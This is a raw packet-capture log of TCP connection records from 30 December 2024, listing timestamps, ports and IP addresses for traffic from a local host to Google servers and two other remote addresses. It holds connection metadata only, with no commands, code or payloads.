                                                                                                                                                                    Dec 30, 2024 04:59:10.331764936 CET49756443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:10.331780910 CET44349756142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:10.628175020 CET44349752142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:10.628407955 CET49752443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:10.628868103 CET49752443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:10.628885984 CET44349752142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:10.629272938 CET49752443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:10.629286051 CET44349752142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:10.644217968 CET44349753142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:10.644351959 CET49753443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:10.644658089 CET49753443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:10.644658089 CET49753443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:10.644668102 CET44349753142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:10.644692898 CET44349753142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:10.653080940 CET44349754142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:10.653351068 CET49754443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:10.653834105 CET44349754142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:10.653933048 CET49754443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:10.664690971 CET49754443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:10.664705038 CET44349754142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:10.664947987 CET44349754142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:10.665105104 CET49754443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:10.665395021 CET49754443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:10.707336903 CET44349754142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:10.943769932 CET44349756142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:10.944489002 CET44349756142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:10.944520950 CET49756443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:10.944552898 CET44349756142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:10.944756985 CET49756443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:10.948756933 CET49756443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:10.948762894 CET44349756142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:10.948983908 CET44349756142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:10.949394941 CET49756443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:10.949394941 CET49756443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:10.991353035 CET44349756142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:11.024569035 CET44349754142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:11.024688005 CET49754443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:11.024697065 CET44349754142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:11.024776936 CET49754443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:11.025640965 CET49754443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:11.025681019 CET44349754142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:11.025813103 CET44349754142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:11.025825977 CET49754443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:11.025861979 CET49754443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:11.026407957 CET49759443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:11.026432037 CET44349759142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:11.026932001 CET49759443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:11.027123928 CET49759443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:11.027138948 CET44349759142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:11.043987989 CET44349752142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:11.044030905 CET44349752142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:11.044059038 CET49752443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:11.044104099 CET44349752142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:11.044137001 CET49752443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:11.044158936 CET44349752142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:11.044600964 CET49752443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:11.048533916 CET49752443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:11.048564911 CET44349752142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:11.057086945 CET49760443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:11.057113886 CET44349760142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:11.057257891 CET49760443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:11.057781935 CET49760443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:11.057796001 CET44349760142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:11.215178967 CET44349753142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:11.215234995 CET44349753142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:11.215259075 CET49753443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:11.215271950 CET44349753142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.028256893 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.028266907 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.028270006 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.028279066 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.028287888 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.028301001 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.033080101 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.033094883 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.033106089 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.033124924 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.033158064 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.211862087 CET44349770142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.211926937 CET49770443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:13.211937904 CET44349770142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.211981058 CET49770443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:13.212738991 CET44349770142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.212785959 CET44349770142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.212806940 CET49770443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:13.212832928 CET49770443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:13.216473103 CET49770443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:13.216480970 CET44349770142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.217585087 CET49776443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:13.217631102 CET44349776142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.217684031 CET49776443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:13.217910051 CET49776443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:13.217920065 CET44349776142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.236727953 CET44349771142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.236764908 CET44349771142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.236782074 CET49771443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:13.236790895 CET44349771142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.236830950 CET49771443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:13.236835957 CET44349771142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.236860037 CET44349771142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.236901045 CET49771443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:13.237318993 CET49771443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:13.237325907 CET44349771142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.238023996 CET49777443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:13.238118887 CET44349777142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.238415003 CET49777443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:13.238751888 CET49777443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:13.238790035 CET44349777142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.239478111 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.239497900 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.239510059 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.239573002 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.239598989 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.239609957 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.239620924 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.239631891 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.239638090 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.239641905 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.239664078 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.239701033 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.240451097 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.240609884 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.240624905 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.240634918 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.240644932 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.240654945 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.240660906 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.240667105 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.240685940 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.240705967 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.241573095 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.241584063 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.241592884 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.241604090 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.241614103 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.241615057 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.241625071 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.241632938 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.241652012 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.242438078 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.242455959 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.242465019 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.242485046 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.242511988 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.368144989 CET44349772142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.368323088 CET49772443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:13.368333101 CET44349772142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.368438005 CET49772443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:13.368558884 CET49772443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:13.368571043 CET44349772142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.369012117 CET49778443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:13.369040012 CET44349778142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.369096994 CET49778443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:13.369467974 CET49778443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:13.369488001 CET44349778142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.389857054 CET44349769142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.389899015 CET44349769142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.389911890 CET49769443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:13.389918089 CET44349769142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.389940023 CET49769443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:13.389971018 CET49769443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:13.389985085 CET44349769142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.390031099 CET44349769142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.390072107 CET49769443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:13.390517950 CET49769443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:13.390525103 CET44349769142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.390898943 CET49779443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:13.390943050 CET44349779142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.391011000 CET49779443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:13.391210079 CET49779443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:13.391236067 CET44349779142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.450783014 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.450795889 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.450844049 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.450845957 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.450946093 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.450963020 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.450973988 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.450990915 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.451003075 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.451009989 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.451013088 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.451020002 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.451045990 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.451055050 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.451718092 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.838150024 CET49777443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:13.838170052 CET44349777142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.839798927 CET49777443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:13.839812994 CET44349777142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.874429941 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.874488115 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.874588013 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.874597073 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.874608040 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.874619007 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.874628067 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.874645948 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.874671936 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.874743938 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.874756098 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.874768019 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.874783039 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.874789000 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.874795914 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.874896049 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.874933004 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.875034094 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.875050068 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.875061035 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.875072002 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.875099897 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.875123978 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.875215054 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.875226021 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.875236034 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.875246048 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.875257015 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.875266075 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.875277042 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.875284910 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.875287056 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.875318050 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.875327110 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.875355005 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.875364065 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.875375032 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.875416040 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.875540018 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.875550985 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.875562906 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.875571012 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.875576019 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.875608921 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.875708103 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.875719070 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.875729084 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.875739098 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.875750065 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.875756025 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.875765085 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.875786066 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:13.957077026 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.994384050 CET44349778142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:13.994505882 CET49778443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:13.994884968 CET49778443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:13.994890928 CET44349778142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:14.000509024 CET44349779142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:14.000571966 CET49779443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:14.002377033 CET49778443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:14.002382040 CET44349778142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:14.003516912 CET49779443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:14.003535032 CET44349779142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:14.003659964 CET49779443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:14.003664017 CET44349779142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:14.033339024 CET49776443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:14.033379078 CET49777443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:14.033382893 CET49778443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:14.033427000 CET49779443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:14.034069061 CET49780443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:14.034101963 CET44349780142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:14.034262896 CET49780443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:14.035132885 CET49780443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:14.035149097 CET44349780142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:14.036503077 CET49781443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:14.036535025 CET44349781142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:14.036604881 CET49781443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:14.037125111 CET49781443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:14.037138939 CET44349781142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:14.037952900 CET49782443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:14.037983894 CET44349782142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:14.038141966 CET49782443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:14.041603088 CET49782443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:14.041615009 CET44349782142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:14.172044039 CET1909149766118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:14.172122955 CET4976619091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:14.377734900 CET4977480192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 04:59:14.382544994 CET8049774180.163.251.230192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:14.659081936 CET44349782142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:14.660797119 CET49782443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:14.682434082 CET44349781142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:14.684917927 CET49781443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:14.685301065 CET8049774180.163.251.230192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:14.685353994 CET4977480192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 04:59:14.687680006 CET44349780142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:14.687788010 CET49780443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:14.804039955 CET49782443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:14.804049015 CET44349782142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:14.808362961 CET49782443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:14.808367014 CET44349782142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:14.813915968 CET49781443192.168.2.4142.250.181.238
